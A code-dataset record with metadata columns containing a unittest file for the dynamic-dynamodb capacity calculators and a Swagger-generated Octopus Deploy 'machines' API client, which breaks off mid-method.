| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
c72bf0292f15fa32241037c7bde3304f253bf448
| 6,168
|
py
|
Python
|
dynamic_dynamodb/tests/test_calculators.py
|
tellybug/dynamic-dynamodb
|
a681194d933cb31507ddde6a225f1a4ddac0509f
|
[
"Apache-2.0"
] | null | null | null |
dynamic_dynamodb/tests/test_calculators.py
|
tellybug/dynamic-dynamodb
|
a681194d933cb31507ddde6a225f1a4ddac0509f
|
[
"Apache-2.0"
] | null | null | null |
dynamic_dynamodb/tests/test_calculators.py
|
tellybug/dynamic-dynamodb
|
a681194d933cb31507ddde6a225f1a4ddac0509f
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
""" Testing the Dynamic DynamoDB calculators """
import unittest
from dynamic_dynamodb import calculators
class TestCalculators(unittest.TestCase):
""" Test the Dynamic DynamoDB calculators """
def test_decrease_reads_in_percent(self):
""" Ensure that a regular decrease works """
result = calculators.decrease_reads_in_percent(200, 90, 1, 'test')
self.assertEqual(result, 20)
def test_decrease_reads_in_percent_hit_min_value(self):
""" Check that min values are honoured """
result = calculators.decrease_reads_in_percent(20, 50, 15, 'test')
self.assertEqual(result, 15)
def test_decrease_reads_in_percent_more_than_100_percent(self):
""" Handle decreases of more that 100% """
result = calculators.decrease_reads_in_percent(20, 120, 1, 'test')
self.assertEqual(result, 1)
def test_decrease_reads_in_percent_type_current_provisioning(self):
""" Check that current_provisioning only takes an int """
self.assertRaises(
TypeError,
calculators.decrease_reads_in_percent,
'100',
90,
1,
'test')
def test_decrease_writes_in_percent(self):
""" Ensure that a regular decrease works """
result = calculators.decrease_writes_in_percent(200, 90, 1, 'test')
self.assertEqual(result, 20)
def test_decrease_writes_in_percent_hit_min_value(self):
""" Check that min values are honoured """
result = calculators.decrease_writes_in_percent(20, 50, 15, 'test')
self.assertEqual(result, 15)
def test_decrease_writes_in_percent_more_than_100_percent(self):
""" Handle decreases of more that 100% """
result = calculators.decrease_writes_in_percent(20, 120, 1, 'test')
self.assertEqual(result, 1)
def test_decrease_writes_in_percent_type_current_provisioning(self):
""" Check that current_provisioning only takes an int """
self.assertRaises(
TypeError,
calculators.decrease_writes_in_percent,
'100',
90,
1,
'test')
def test_decrease_reads_in_units(self):
""" Ensure that a regular decrease works """
result = calculators.decrease_reads_in_units(200, 90, 1, 'test')
self.assertEqual(result, 110)
def test_decrease_reads_in_percent_hit_miunits(self):
""" Check that min values are honoured """
result = calculators.decrease_reads_in_units(20, 50, 15, 'test')
self.assertEqual(result, 15)
def test_decrease_reads_in_percent_more_than_100_units(self):
""" Handle decreases of more that 100% """
result = calculators.decrease_reads_in_units(20, 120, 1, 'test')
self.assertEqual(result, 1)
def test_decrease_writes_in_units(self):
""" Ensure that a regular decrease works """
result = calculators.decrease_writes_in_units(200, 90, 1, 'test')
self.assertEqual(result, 110)
def test_decrease_writes_in_units_hit_min_value(self):
""" Check that min values are honoured """
result = calculators.decrease_writes_in_units(20, 50, 15, 'test')
self.assertEqual(result, 15)
def test_increase_reads_in_percent(self):
""" Ensure that a regular increase works """
result = calculators.increase_reads_in_percent(200, 50, 400, 'test')
self.assertEqual(result, 300)
def test_increase_reads_in_percent_hit_max_value(self):
""" Check that max values are honoured """
result = calculators.increase_reads_in_percent(20, 50, 15, 'test')
self.assertEqual(result, 15)
def test_increase_reads_in_percent_more_than_100_percent(self):
""" Handle increases of more that 100% """
result = calculators.increase_reads_in_percent(20, 120, 1, 'test')
self.assertEqual(result, 1)
def test_increase_reads_in_percent_type_current_provisioning(self):
""" Check that current_provisioning only takes an int """
self.assertRaises(
TypeError,
calculators.increase_reads_in_percent,
'100',
90,
1,
'test')
def test_increase_writes_in_percent(self):
""" Ensure that a regular increase works """
result = calculators.increase_writes_in_percent(200, 50, 400, 'test')
self.assertEqual(result, 300)
def test_increase_writes_in_percent_hit_max_value(self):
""" Check that max values are honoured """
result = calculators.increase_writes_in_percent(20, 50, 15, 'test')
self.assertEqual(result, 15)
def test_increase_writes_in_percent_more_than_100_percent(self):
""" Handle increases of more that 100% """
result = calculators.increase_writes_in_percent(20, 120, 1, 'test')
self.assertEqual(result, 1)
def test_increase_writes_in_percent_type_current_provisioning(self):
""" Check that current_provisioning only takes an int """
self.assertRaises(
TypeError,
calculators.increase_writes_in_percent,
'100',
90,
1,
'test')
def test_increase_reads_in_units(self):
""" Ensure that a regular increase works """
result = calculators.increase_reads_in_units(200, 90, 300, 'test')
self.assertEqual(result, 290)
def test_increase_reads_in_units_hit_max_units(self):
""" Check that max values are honoured """
result = calculators.increase_reads_in_units(20, 50, 25, 'test')
self.assertEqual(result, 25)
def test_increase_writes_in_units(self):
""" Ensure that a regular increase works """
result = calculators.increase_writes_in_units(200, 90, 300, 'test')
self.assertEqual(result, 290)
def test_increase_writes_in_units_hit_max_value(self):
""" Check that max values are honoured """
result = calculators.increase_writes_in_units(20, 10, 25, 'test')
self.assertEqual(result, 25)
if __name__ == '__main__':
unittest.main(verbosity=3)
| 39.286624
| 77
| 0.665532
| 761
| 6,168
| 5.074901
| 0.09724
| 0.079234
| 0.103314
| 0.13594
| 0.941999
| 0.940963
| 0.901346
| 0.894355
| 0.88581
| 0.841792
| 0
| 0.049638
| 0.238975
| 6,168
| 156
| 78
| 39.538462
| 0.773115
| 0.174935
| 0
| 0.45
| 0
| 0
| 0.024361
| 0
| 0
| 0
| 0
| 0
| 0.25
| 1
| 0.25
| false
| 0
| 0.02
| 0
| 0.28
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
c787224e36fcbcc301a069c3f35301a7b194d2b4
| 87,834
|
py
|
Python
|
octopus_deploy_swagger_client/octopus_deploy_client/machines_api.py
|
cvent/octopus-deploy-api-client
|
0e03e842e1beb29b132776aee077df570b88366a
|
[
"Apache-2.0"
] | null | null | null |
octopus_deploy_swagger_client/octopus_deploy_client/machines_api.py
|
cvent/octopus-deploy-api-client
|
0e03e842e1beb29b132776aee077df570b88366a
|
[
"Apache-2.0"
] | null | null | null |
octopus_deploy_swagger_client/octopus_deploy_client/machines_api.py
|
cvent/octopus-deploy-api-client
|
0e03e842e1beb29b132776aee077df570b88366a
|
[
"Apache-2.0"
] | null | null | null |
# coding: utf-8
"""
Octopus Server API
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen) # noqa: E501
OpenAPI spec version: 2019.6.7+Branch.tags-2019.6.7.Sha.aa18dc6809953218c66f57eff7d26481d9b23d6a
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from octopus_deploy_swagger_client.api_client import ApiClient
class MachinesApi(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def create_response_descriptor_machines_deployment_targets_deployment_target_deployment_target_resource(self, **kwargs): # noqa: E501
"""Create a DeploymentTargetResource # noqa: E501
Creates a new machine. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_response_descriptor_machines_deployment_targets_deployment_target_deployment_target_resource(async_req=True)
>>> result = thread.get()
:param async_req bool
:param DeploymentTargetResource deployment_target_resource: The DeploymentTargetResource resource to create
:return: DeploymentTargetResource
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.create_response_descriptor_machines_deployment_targets_deployment_target_deployment_target_resource_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.create_response_descriptor_machines_deployment_targets_deployment_target_deployment_target_resource_with_http_info(**kwargs) # noqa: E501
return data
def create_response_descriptor_machines_deployment_targets_deployment_target_deployment_target_resource_with_http_info(self, **kwargs): # noqa: E501
"""Create a DeploymentTargetResource # noqa: E501
Creates a new machine. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_response_descriptor_machines_deployment_targets_deployment_target_deployment_target_resource_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:param DeploymentTargetResource deployment_target_resource: The DeploymentTargetResource resource to create
:return: DeploymentTargetResource
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['deployment_target_resource'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method create_response_descriptor_machines_deployment_targets_deployment_target_deployment_target_resource" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'deployment_target_resource' in params:
body_params = params['deployment_target_resource']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['APIKeyHeader', 'APIKeyQuery', 'NugetApiKeyHeader'] # noqa: E501
return self.api_client.call_api(
'/api/machines', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='DeploymentTargetResource', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def create_response_descriptor_machines_deployment_targets_deployment_target_deployment_target_resource_spaces(self, base_space_id, **kwargs): # noqa: E501
"""Create a DeploymentTargetResource # noqa: E501
Creates a new machine. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_response_descriptor_machines_deployment_targets_deployment_target_deployment_target_resource_spaces(base_space_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str base_space_id: ID of the space (required)
:param DeploymentTargetResource deployment_target_resource: The DeploymentTargetResource resource to create
:return: DeploymentTargetResource
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.create_response_descriptor_machines_deployment_targets_deployment_target_deployment_target_resource_spaces_with_http_info(base_space_id, **kwargs) # noqa: E501
else:
(data) = self.create_response_descriptor_machines_deployment_targets_deployment_target_deployment_target_resource_spaces_with_http_info(base_space_id, **kwargs) # noqa: E501
return data
def create_response_descriptor_machines_deployment_targets_deployment_target_deployment_target_resource_spaces_with_http_info(self, base_space_id, **kwargs): # noqa: E501
"""Create a DeploymentTargetResource # noqa: E501
Creates a new machine. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_response_descriptor_machines_deployment_targets_deployment_target_deployment_target_resource_spaces_with_http_info(base_space_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str base_space_id: ID of the space (required)
:param DeploymentTargetResource deployment_target_resource: The DeploymentTargetResource resource to create
:return: DeploymentTargetResource
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['base_space_id', 'deployment_target_resource'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method create_response_descriptor_machines_deployment_targets_deployment_target_deployment_target_resource_spaces" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'base_space_id' is set
if ('base_space_id' not in params or
params['base_space_id'] is None):
raise ValueError("Missing the required parameter `base_space_id` when calling `create_response_descriptor_machines_deployment_targets_deployment_target_deployment_target_resource_spaces`") # noqa: E501
collection_formats = {}
path_params = {}
if 'base_space_id' in params:
path_params['baseSpaceId'] = params['base_space_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'deployment_target_resource' in params:
body_params = params['deployment_target_resource']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['APIKeyHeader', 'APIKeyQuery', 'NugetApiKeyHeader'] # noqa: E501
return self.api_client.call_api(
'/api/{baseSpaceId}/machines', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='DeploymentTargetResource', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def custom_action_response_descriptor_octopus_server_web_api_actions_deployment_target_connection_status_responder(self, id, **kwargs): # noqa: E501
"""custom_action_response_descriptor_octopus_server_web_api_actions_deployment_target_connection_status_responder # noqa: E501
Get the status of the network connection between the Octopus server and a machine. NOTE: This definition is not complete. We will be adding more detail in future releases of Octopus. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.custom_action_response_descriptor_octopus_server_web_api_actions_deployment_target_connection_status_responder(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: ID of the resource (required)
:return: MachineConnectionStatus
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.custom_action_response_descriptor_octopus_server_web_api_actions_deployment_target_connection_status_responder_with_http_info(id, **kwargs) # noqa: E501
else:
(data) = self.custom_action_response_descriptor_octopus_server_web_api_actions_deployment_target_connection_status_responder_with_http_info(id, **kwargs) # noqa: E501
return data
def custom_action_response_descriptor_octopus_server_web_api_actions_deployment_target_connection_status_responder_with_http_info(self, id, **kwargs): # noqa: E501
"""custom_action_response_descriptor_octopus_server_web_api_actions_deployment_target_connection_status_responder # noqa: E501
Get the status of the network connection between the Octopus server and a machine. NOTE: This definition is not complete. We will be adding more detail in future releases of Octopus. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.custom_action_response_descriptor_octopus_server_web_api_actions_deployment_target_connection_status_responder_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: ID of the resource (required)
:return: MachineConnectionStatus
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method custom_action_response_descriptor_octopus_server_web_api_actions_deployment_target_connection_status_responder" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params or
params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `custom_action_response_descriptor_octopus_server_web_api_actions_deployment_target_connection_status_responder`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in params:
path_params['id'] = params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['APIKeyHeader', 'APIKeyQuery', 'NugetApiKeyHeader'] # noqa: E501
return self.api_client.call_api(
'/api/machines/{id}/connection', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='MachineConnectionStatus', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def custom_action_response_descriptor_octopus_server_web_api_actions_deployment_target_connection_status_responder_spaces(self, base_space_id, id, **kwargs): # noqa: E501
"""custom_action_response_descriptor_octopus_server_web_api_actions_deployment_target_connection_status_responder_spaces # noqa: E501
Get the status of the network connection between the Octopus server and a machine. NOTE: This definition is not complete. We will be adding more detail in future releases of Octopus. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.custom_action_response_descriptor_octopus_server_web_api_actions_deployment_target_connection_status_responder_spaces(base_space_id, id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str base_space_id: ID of the space (required)
:param str id: ID of the resource (required)
:return: MachineConnectionStatus
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.custom_action_response_descriptor_octopus_server_web_api_actions_deployment_target_connection_status_responder_spaces_with_http_info(base_space_id, id, **kwargs) # noqa: E501
else:
(data) = self.custom_action_response_descriptor_octopus_server_web_api_actions_deployment_target_connection_status_responder_spaces_with_http_info(base_space_id, id, **kwargs) # noqa: E501
return data
def custom_action_response_descriptor_octopus_server_web_api_actions_deployment_target_connection_status_responder_spaces_with_http_info(self, base_space_id, id, **kwargs): # noqa: E501
"""custom_action_response_descriptor_octopus_server_web_api_actions_deployment_target_connection_status_responder_spaces # noqa: E501
Get the status of the network connection between the Octopus server and a machine. NOTE: This definition is not complete. We will be adding more detail in future releases of Octopus. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.custom_action_response_descriptor_octopus_server_web_api_actions_deployment_target_connection_status_responder_spaces_with_http_info(base_space_id, id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str base_space_id: ID of the space (required)
:param str id: ID of the resource (required)
:return: MachineConnectionStatus
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['base_space_id', 'id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method custom_action_response_descriptor_octopus_server_web_api_actions_deployment_target_connection_status_responder_spaces" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'base_space_id' is set
if ('base_space_id' not in params or
params['base_space_id'] is None):
raise ValueError("Missing the required parameter `base_space_id` when calling `custom_action_response_descriptor_octopus_server_web_api_actions_deployment_target_connection_status_responder_spaces`") # noqa: E501
# verify the required parameter 'id' is set
if ('id' not in params or
params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `custom_action_response_descriptor_octopus_server_web_api_actions_deployment_target_connection_status_responder_spaces`") # noqa: E501
collection_formats = {}
path_params = {}
if 'base_space_id' in params:
path_params['baseSpaceId'] = params['base_space_id'] # noqa: E501
if 'id' in params:
path_params['id'] = params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['APIKeyHeader', 'APIKeyQuery', 'NugetApiKeyHeader'] # noqa: E501
return self.api_client.call_api(
'/api/{baseSpaceId}/machines/{id}/connection', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='MachineConnectionStatus', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def custom_action_response_descriptor_octopus_server_web_api_actions_discover_deployment_target_responder(self, **kwargs): # noqa: E501
"""custom_action_response_descriptor_octopus_server_web_api_actions_discover_deployment_target_responder # noqa: E501
Interrogate a machine for communication details so that it may be added to the installation. NOTE: This definition is not complete. We will be adding more detail in future releases of Octopus. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.custom_action_response_descriptor_octopus_server_web_api_actions_discover_deployment_target_responder(async_req=True)
>>> result = thread.get()
:param async_req bool
:return: MachineResource
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.custom_action_response_descriptor_octopus_server_web_api_actions_discover_deployment_target_responder_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.custom_action_response_descriptor_octopus_server_web_api_actions_discover_deployment_target_responder_with_http_info(**kwargs) # noqa: E501
return data
def custom_action_response_descriptor_octopus_server_web_api_actions_discover_deployment_target_responder_with_http_info(self, **kwargs): # noqa: E501
"""custom_action_response_descriptor_octopus_server_web_api_actions_discover_deployment_target_responder # noqa: E501
Interrogate a machine for communication details so that it may be added to the installation. NOTE: This definition is not complete. We will be adding more detail in future releases of Octopus. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.custom_action_response_descriptor_octopus_server_web_api_actions_discover_deployment_target_responder_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:return: MachineResource
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['host','port'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method custom_action_response_descriptor_octopus_server_web_api_actions_discover_deployment_target_responder" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'host' in params:
query_params.append(('host', params['host']))
if 'port' in params:
query_params.append(('port', params['port']))
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['APIKeyHeader', 'APIKeyQuery', 'NugetApiKeyHeader'] # noqa: E501
return self.api_client.call_api(
'/api/machines/discover', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='MachineResource', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def custom_action_response_descriptor_octopus_server_web_api_actions_discover_deployment_target_responder_spaces(self, base_space_id, **kwargs): # noqa: E501
"""custom_action_response_descriptor_octopus_server_web_api_actions_discover_deployment_target_responder_spaces # noqa: E501
Interrogate a machine for communication details so that it may be added to the installation. NOTE: This definition is not complete. We will be adding more detail in future releases of Octopus. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.custom_action_response_descriptor_octopus_server_web_api_actions_discover_deployment_target_responder_spaces(base_space_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str base_space_id: ID of the space (required)
:return: MachineResource
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.custom_action_response_descriptor_octopus_server_web_api_actions_discover_deployment_target_responder_spaces_with_http_info(base_space_id, **kwargs) # noqa: E501
else:
(data) = self.custom_action_response_descriptor_octopus_server_web_api_actions_discover_deployment_target_responder_spaces_with_http_info(base_space_id, **kwargs) # noqa: E501
return data
def custom_action_response_descriptor_octopus_server_web_api_actions_discover_deployment_target_responder_spaces_with_http_info(self, base_space_id, **kwargs): # noqa: E501
"""custom_action_response_descriptor_octopus_server_web_api_actions_discover_deployment_target_responder_spaces # noqa: E501
Interrogate a machine for communication details so that it may be added to the installation. NOTE: This definition is not complete. We will be adding more detail in future releases of Octopus. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.custom_action_response_descriptor_octopus_server_web_api_actions_discover_deployment_target_responder_spaces_with_http_info(base_space_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str base_space_id: ID of the space (required)
:return: MachineResource
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['base_space_id', 'host', 'port'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method custom_action_response_descriptor_octopus_server_web_api_actions_discover_deployment_target_responder_spaces" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'base_space_id' is set
if ('base_space_id' not in params or
params['base_space_id'] is None):
raise ValueError("Missing the required parameter `base_space_id` when calling `custom_action_response_descriptor_octopus_server_web_api_actions_discover_deployment_target_responder_spaces`") # noqa: E501
collection_formats = {}
path_params = {}
if 'base_space_id' in params:
path_params['baseSpaceId'] = params['base_space_id'] # noqa: E501
query_params = []
if 'host' in params:
query_params.append(('host', params['host']))
if 'port' in params:
query_params.append(('port', params['port']))
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['APIKeyHeader', 'APIKeyQuery', 'NugetApiKeyHeader'] # noqa: E501
return self.api_client.call_api(
'/api/{baseSpaceId}/machines/discover', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='MachineResource', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def custom_query_response_descriptor_octopus_server_web_api_actions_list_deployment_target_responder(self, **kwargs): # noqa: E501
"""custom_query_response_descriptor_octopus_server_web_api_actions_list_deployment_target_responder # noqa: E501
Lists all of the registered machines in the supplied Octopus Deploy Space, from all environments. The results will be sorted alphabetically by name. NOTE: This definition is not complete. We will be adding more detail in future releases of Octopus. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.custom_query_response_descriptor_octopus_server_web_api_actions_list_deployment_target_responder(async_req=True)
>>> result = thread.get()
:param async_req bool
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.custom_query_response_descriptor_octopus_server_web_api_actions_list_deployment_target_responder_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.custom_query_response_descriptor_octopus_server_web_api_actions_list_deployment_target_responder_with_http_info(**kwargs) # noqa: E501
return data
def custom_query_response_descriptor_octopus_server_web_api_actions_list_deployment_target_responder_with_http_info(self, **kwargs): # noqa: E501
"""custom_query_response_descriptor_octopus_server_web_api_actions_list_deployment_target_responder # noqa: E501
Lists all of the registered machines in the supplied Octopus Deploy Space, from all environments. The results will be sorted alphabetically by name. NOTE: This definition is not complete. We will be adding more detail in future releases of Octopus. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.custom_query_response_descriptor_octopus_server_web_api_actions_list_deployment_target_responder_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = [] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method custom_query_response_descriptor_octopus_server_web_api_actions_list_deployment_target_responder" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['APIKeyHeader', 'APIKeyQuery', 'NugetApiKeyHeader'] # noqa: E501
return self.api_client.call_api(
'/api/machines', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def custom_query_response_descriptor_octopus_server_web_api_actions_list_deployment_target_responder_spaces(self, base_space_id, **kwargs): # noqa: E501
"""custom_query_response_descriptor_octopus_server_web_api_actions_list_deployment_target_responder_spaces # noqa: E501
Lists all of the registered machines in the supplied Octopus Deploy Space, from all environments. The results will be sorted alphabetically by name. NOTE: This definition is not complete. We will be adding more detail in future releases of Octopus. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.custom_query_response_descriptor_octopus_server_web_api_actions_list_deployment_target_responder_spaces(base_space_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str base_space_id: ID of the space (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.custom_query_response_descriptor_octopus_server_web_api_actions_list_deployment_target_responder_spaces_with_http_info(base_space_id, **kwargs) # noqa: E501
else:
(data) = self.custom_query_response_descriptor_octopus_server_web_api_actions_list_deployment_target_responder_spaces_with_http_info(base_space_id, **kwargs) # noqa: E501
return data
def custom_query_response_descriptor_octopus_server_web_api_actions_list_deployment_target_responder_spaces_with_http_info(self, base_space_id, **kwargs): # noqa: E501
